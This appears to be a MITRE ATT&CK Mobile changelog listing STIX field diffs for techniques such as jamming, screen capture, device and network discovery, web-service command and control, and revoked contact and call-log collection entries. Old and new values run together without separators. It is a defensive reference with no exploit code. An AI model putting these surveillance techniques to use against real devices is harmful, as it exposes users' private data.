descriptionAn attacker could jam radio signals (e.g. Wi-Fi, cellular, GPS) to prevent the mobile device from communicating. (Citation: NIST-SP800187)(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth that services rely on, or by jamming the signal going to or coming from devices. A Network DoS will occur when an adversary is able to jam radio signals (e.g. Wi-Fi, cellular, GPS) around a device to prevent it from communicating. For example, to jam cellular signal, an adversary may use a handheld signal jammer, which jam devices within the jammer’s operational range.(Citation: NIST-SP800187) Usage of cellular jamming has been documented in several arrests reported in the news.(Citation: CNET-Celljammer)(Citation: NYTimes-Celljam)(Citation: Digitaltrends-Celljam)(Citation: Arstechnica-Celljam)
kill_chain_phases[0]['phase_name']network-effectsimpact
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueCNET-Celljammer
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.htmlhttps://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/
external_references[2]['source_name']NIST Mobile Threat CatalogueArstechnica-Celljam
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.htmlhttps://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/
external_references[3]['source_name']NIST Mobile Threat CatalogueNIST-SP800187
external_references[3]['url']https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.htmlhttp://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdf
external_references[4]['source_name']NIST Mobile Threat CatalogueNYTimes-Celljam
external_references[4]['url']https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.htmlhttps://www.nytimes.com/2007/11/04/technology/04jammer.html
external_references[5]['source_name']NIST-SP800187Digitaltrends-Celljam
external_references[5]['description']Jeffrey Cichonski, Joshua M Franklin, Michael Bartock. (2017, December). Guide to LTE Security. Retrieved January 20, 2017.Trevor Mogg. (2015, June 5). Florida teacher punished after signal-jamming his students’ cell phones. Retrieved November 8, 2018.
external_references[5]['url']http://csrc.nist.gov/publications/drafts/800-187/sp800_187_draft.pdfhttps://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/
external_references[6]['source_name']CNET-CelljammerNIST Mobile Threat Catalogue
external_references[6]['url']https://www.cnet.com/news/man-put-cell-phone-jammer-in-car-to-stop-driver-calls-fcc-says/https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-7.html
external_references[7]['source_name']NYTimes-CelljamNIST Mobile Threat Catalogue
external_references[7]['url']https://www.nytimes.com/2007/11/04/technology/04jammer.htmlhttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-8.html
external_references[8]['source_name']Digitaltrends-CelljamNIST Mobile Threat Catalogue
external_references[8]['url']https://www.digitaltrends.com/mobile/florida-teacher-punished-after-signal-jamming-his-students-cell-phones/https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-5.html
external_references[9]['source_name']Arstechnica-CelljamNIST Mobile Threat Catalogue
external_references[9]['url']https://arstechnica.com/tech-policy/2016/03/man-accused-of-jamming-passengers-cell-phones-on-chicago-subway/https://pages.nist.gov/mobile-threat-catalogue/gps-threats/GPS-0.html
x_mitre_tactic_type[0]Without Adversary Device AccessPost-Adversary Device Access
x_mitre_version1.11.2

[T1423] Network Service Scanning

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionNetwork service scanning can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1026
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-11 19:12:38.451000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.01.1

[T1513] Screen Capture

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use screen captures to collect information at1Adversaries may use screen capture to collect additional inf
>bout applications running in the foreground, capture user da>ormation about a target device, such as applications running
>ta, credentials, or other sensitive information. Application> in the foreground, user data, credentials, or other sensiti
>s running in the background can capture screenshots or video>ve information. Applications running in the background can c
>s of another application running in the foreground by using >apture screenshots or videos of another application running 
>the Android `MediaProjectionManager` (generally requires the>in the foreground by using the Android `MediaProjectionManag
> device user to grant consent).(Citation: Fortinet screencap>er` (generally requires the device user to grant consent).(C
> July 2019)(Citation: Android ScreenCap1 2019) Background ap>itation: Fortinet screencap July 2019)(Citation: Android Scr
>plications can also use Android accessibility services to ca>eenCap1 2019) Background applications can also use Android a
>pture screen contents being displayed by a foreground applic>ccessibility services to capture screen contents being displ
>ation.(Citation: Lookout-Monokle) An adversary with root acc>ayed by a foreground application.(Citation: Lookout-Monokle)
>ess or Android Debug Bridge (adb) access could call the Andr> An adversary with root access or Android Debug Bridge (adb)
>oid `screencap` or `screenrecord` commands.(Citation: Androi> access could call the Android `screencap` or `screenrecord`
>d ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015> commands.(Citation: Android ScreenCap2 2019)(Citation: Tren
>)>d Micro ScreenCap July 2015) 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAndroid Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.
external_referencesAPP-40
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesAPP-40
external_referencesZhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved August 8, 2019.
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 15:03:25.857000+00:002022-04-01 13:31:00.559000+00:00
descriptionAdversaries may use screen captures to collect information about applications running in the foreground, capture user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid ScreenCap2 2019
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.htmlhttps://developer.android.com/studio/command-line/adb
external_references[2]['source_name']Fortinet screencap July 2019Android ScreenCap1 2019
external_references[2]['description']Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.Android Developers. (n.d.). Android MediaProjectionManager. Retrieved August 8, 2019.
external_references[2]['url']https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.htmlhttps://developer.android.com/reference/android/media/projection/MediaProjectionManager
external_references[3]['source_name']Android ScreenCap1 2019Lookout-Monokle
external_references[3]['description']Android Developers. (n.d.). Android MediaProjectionManager. Retrieved August 8, 2019.Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.
external_references[3]['url']https://developer.android.com/reference/android/media/projection/MediaProjectionManagerhttps://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf
external_references[4]['source_name']Lookout-MonokleFortinet screencap July 2019
external_references[4]['description']Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.Dario Durando. (2019, July 3). BianLian: A New Wave Emerges. Retrieved September 4, 2019.
external_references[4]['url']https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdfhttps://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html
external_references[5]['source_name']Android ScreenCap2 2019Trend Micro ScreenCap July 2015
external_references[5]['description']Android Developers. (n.d.). Android Debug Bridge (adb). Retrieved August 8, 2019.Zhang, V. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved August 8, 2019.
external_references[5]['url']https://developer.android.com/studio/command-line/adbhttps://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/
external_references[6]['source_name']Trend Micro ScreenCap July 2015NIST Mobile Threat Catalogue
external_references[6]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html
x_mitre_detectionThe user can view a list of apps with accessibility service privileges in the device settings.The user can view a list of apps with accessibility service privileges in the device settings. Application vetting services can look for the use of the Android `MediaProjectionManager` class, applying extra scrutiny to applications that use the class.
x_mitre_version1.11.2

[T1426] System Information Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may attempt to get detailed information about tt1Adversaries may attempt to get detailed information about a 
>he operating system and hardware, including version, patches>device’s operating system and hardware, including versions, 
>, and architecture.  On Android, much of this information is>patches, and architecture. Adversaries may use the informati
> programmatically accessible to applications through the and>on from [System Information Discovery](https://attack.mitre.
>roid.os.Build class.(Citation: Android-Build)  On iOS, techn>org/techniques/T1426) during automated discovery to shape fo
>iques exist for applications to programmatically access this>llow-on behaviors, including whether or not to fully infects
> information.(Citation: StackOverflow-iOSVersion)> the target and/or attempts specific actions.      On Androi
 >d, much of this information is programmatically accessible t
 >o applications through the `android.os.Build` class. (Citati
 >on: Android-Build) iOS is much more restrictive with what in
 >formation is visible to applications. Typically, application
 >s will only be able to query the device model and which vers
 >ion of iOS it is running. 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionSystem information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesAPP-12
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1029
external_referencesStack Overflow. (n.d.). How can we programmatically detect which iOS version is device running on?. Retrieved December 21, 2016.
values_changed
STIX FieldOld valueNew Value
modified2019-11-20 19:56:49.109000+00:002022-04-11 19:21:34.776000+00:00
descriptionAn adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture. On Android, much of this information is programmatically accessible to applications through the android.os.Build class.(Citation: Android-Build) On iOS, techniques exist for applications to programmatically access this information.(Citation: StackOverflow-iOSVersion)Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions. On Android, much of this information is programmatically accessible to applications through the `android.os.Build` class. (Citation: Android-Build) iOS is much more restrictive with what information is visible to applications. Typically, applications will only be able to query the device model and which version of iOS it is running.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[2]['source_name']StackOverflow-iOSVersionNIST Mobile Threat Catalogue
external_references[2]['url']http://stackoverflow.com/questions/7848766/how-can-we-programmatically-detect-which-ios-version-is-device-running-onhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html
x_mitre_version1.11.2

[T1422] System Network Configuration Discovery

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
New Description
t1On Android, details of onboard network interfaces are accesst1Adversaries may look for details about the network configura
>ible to apps through the `java.net.NetworkInterface` class.(>tion and settings, such as IP and/or MAC addresses, of opera
>Citation: NetworkInterface) The Android `TelephonyManager` c>ting systems they access or through information discovery of
>lass can be used to gather related information such as the I> remote systems.      On Android, details of onboard network
>MSI, IMEI, and phone number.(Citation: TelephonyManager)  On> interfaces are accessible to apps through the `java.net.Net
> iOS, gathering network configuration information is not pos>workInterface` class.(Citation: NetworkInterface) Previously
>sible without root access.>, the Android `TelephonyManager` class could be used to gath
 >er telephony-related device identifiers, information such as
 > the IMSI, IMEI, and phone number. However, starting with An
 >droid 10, only preloaded, carrier, the default SMS, or devic
 >e and profile owner applications can access the telephony-re
 >lated device identifiers.(Citation: TelephonyManager)      O
 >n iOS, gathering network configuration information is not po
 >ssible without root access.      Adversaries may use the inf
 >ormation from [System Network Configuration Discovery](https
 >://attack.mitre.org/techniques/T1422) during automated disco
 >very to shape follow-on behaviors, including determining cer
 >tain access within the target network and what actions to do
 > next. 

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionApplication vetting services could look for usage of the `READ_PRIVILEGED_PHONE_STATE` Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1025
values_changed
STIX FieldOld valueNew Value
modified2020-06-02 14:35:01.479000+00:002022-03-30 21:04:12.723000+00:00
descriptionOn Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) The Android `TelephonyManager` class can be used to gather related information such as the IMSI, IMEI, and phone number.(Citation: TelephonyManager) On iOS, gathering network configuration information is not possible without root access.Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems. On Android, details of onboard network interfaces are accessible to apps through the `java.net.NetworkInterface` class.(Citation: NetworkInterface) Previously, the Android `TelephonyManager` class could be used to gather telephony-related device identifiers, information such as the IMSI, IMEI, and phone number. However, starting with Android 10, only preloaded, carrier, the default SMS, or device and profile owner applications can access the telephony-related device identifiers.(Citation: TelephonyManager) On iOS, gathering network configuration information is not possible without root access. Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version2.12.2

[T1421] System Network Connections Discovery

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
New Description
t1On Android, applications can use standard APIs to gather a lt1Adversaries may attempt to get a listing of network connecti
>ist of network connections to and from the device. For examp>ons to or from the compromised device they are currently acc
>le, the Network Connections app available in the Google Play>essing or from remote systems by querying for information ov
> Store (Citation: ConnMonitor) advertises this functionality>er the network.      This is typically accomplished by utili
>.>zing device APIs to collect information about nearby network
 >s, such as Wi-Fi, Bluetooth, and cellular tower connections.
 > On Android, this can be done by querying the respective API
 >s:      * `WifiInfo` for information about the current Wi-Fi
 > connection, as well as nearby Wi-Fi networks. Querying the 
 >`WiFiInfo` API requires the application to hold the `ACCESS_
 >FINE_LOCATION` permission.   * `BluetoothAdapter` for inform
 >ation about Bluetooth devices, which also requires the appli
 >cation to hold several permissions granted by the user at ru
 >ntime.   * For Android versions prior to Q, applications can
 > use the `TelephonyManager.getNeighboringCellInfo()` method.
 > For Q and later, applications can use the `TelephonyManager
 >.getAllCellInfo()` method. Both methods require the applicat
 >ion hold the `ACCESS_FINE_LOCATION` permission.

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionSystem Network Connections Discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1024
values_changed
STIX FieldOld valueNew Value
modified2019-02-01 19:34:17.460000+00:002022-03-31 16:31:12.821000+00:00
descriptionOn Android, applications can use standard APIs to gather a list of network connections to and from the device. For example, the Network Connections app available in the Google Play Store (Citation: ConnMonitor) advertises this functionality.Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network. This is typically accomplished by utilizing device APIs to collect information about nearby networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be done by querying the respective APIs: * `WifiInfo` for information about the current Wi-Fi connection, as well as nearby Wi-Fi networks. Querying the `WiFiInfo` API requires the application to hold the `ACCESS_FINE_LOCATION` permission. * `BluetoothAdapter` for information about Bluetooth devices, which also requires the application to hold several permissions granted by the user at runtime. * For Android versions prior to Q, applications can use the `TelephonyManager.getNeighboringCellInfo()` method. For Q and later, applications can use the `TelephonyManager.getAllCellInfo()` method. Both methods require the application hold the `ACCESS_FINE_LOCATION` permission.
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version2.02.1
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'ConnMonitor', 'description': 'Anti Spy Mobile. (2016, March 14). Network Connections. Retrieved December 21, 2016.', 'url': 'https://play.google.com/store/apps/details?id=com.antispycell.connmonitor&hl=en'}

[T1481] Web Service

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use an existing, legitimate external Web sert1Adversaries may use an existing, legitimate external Web ser
>vice as a means for relaying commands to a compromised syste>vice as a means for relaying data to/from a compromised syst
>m.  These commands may also include pointers to command and >em. Popular websites and social media, acting as a mechanism
>control (C2) infrastructure. Adversaries may post content, k> for C2, may give a significant amount of cover. This is due
>nown as a dead drop resolver, on Web services with embedded > to the likelihood that hosts within a network are already c
>(and often obfuscated/encoded) domains or IP addresses. Once>ommunicating with them prior to a compromise. Using common s
> infected, victims will reach out to and be redirected by th>ervices, such as those offered by Google or Twitter, makes i
>ese resolvers.  Popular websites and social media acting as >t easier for adversaries to hide in expected noise. Web serv
>a mechanism for C2 may give a significant amount of cover du>ice providers commonly use SSL/TLS encryption, giving advers
>e to the likelihood that hosts within a network are already >aries an added level of protection.      Use of Web services
>communicating with them prior to a compromise. Using common > may also protect back-end C2 infrastructure from discovery 
>services, such as those offered by Google or Twitter, makes >through malware binary analysis, or enable operational resil
>it easier for adversaries to hide in expected noise. Web ser>iency (since this infrastructure may be dynamically changed)
>vice providers commonly use SSL/TLS encryption, giving adver>.    
>saries an added level of protection.  Use of Web services ma 
>y also protect back-end C2 infrastructure from discovery thr 
>ough malware binary analysis while also enabling operational 
> resiliency (since this infrastructure may be dynamically ch 
>anged). 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionApplication vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-02-01 17:29:43.503000+00:002022-04-06 15:35:05.775000+00:00
descriptionAdversaries may use an existing, legitimate external Web service as a means for relaying commands to a compromised system. These commands may also include pointers to command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed).
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.01.1
Metadata-only Changes

[T1616] Call Control

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-09-27 18:05:42.788000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1577] Compromise Application Executable

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-27 13:23:34.159000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1617] Hooking

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-04 20:08:47.559000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1516] Input Injection

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 15:02:13.323000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1604] Proxy Through Victim

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-12-04 20:30:31.513000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1582] SMS Control

Current version: 1.0

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-22 17:04:15.578000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1603] Scheduled Task/Job

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-11-04 19:45:38.144000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-mobile-attackmitre-attack
Revocations

[T1435] Access Calendar Entries

Current version: 1.0

Description: An adversary could call standard operating system APIs from a malicious application to gather calendar entry data, or with escalated privileges could directly access files containing calendar data.

This object has been revoked by [T1636.001] Calendar Entries

Description for [T1636.001] Calendar Entries: Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework. If the device has been jailbroken or rooted, an adversary may be able to access [Calendar Entries](https://attack.mitre.org/techniques/T1636/001) without the user’s knowledge or approval.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1038
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-01 12:50:48.453000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1433] Access Call Log

Current version: 1.1

Description: On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data. On iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.

This object has been revoked by [T1636.002] Call Log

Description for [T1636.002] Call Log: Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log. If the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user’s knowledge or approval.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1036
values_changed
STIX FieldOld valueNew Value
modified2019-09-18 18:17:43.466000+00:002022-04-01 13:14:43.174000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1432] Access Contact List

Current version: 1.0

Description: An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.

This object has been revoked by [T1636.003] Contact List

Description for [T1636.003] Contact List: Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework. If the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user’s knowledge or approval.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1035
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-01 13:19:41.180000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1402] Broadcast Receivers

Current version: 2.0

Description: An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. Further, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

This object has been revoked by [T1624.001] Broadcast Receivers

Description for [T1624.001] Broadcast Receivers: Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. An intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. In addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_contributors['Alex Hinchliffe, Palo Alto Networks']
x_mitre_old_attack_idMOB-T1005
values_changed
STIX FieldOld valueNew Value
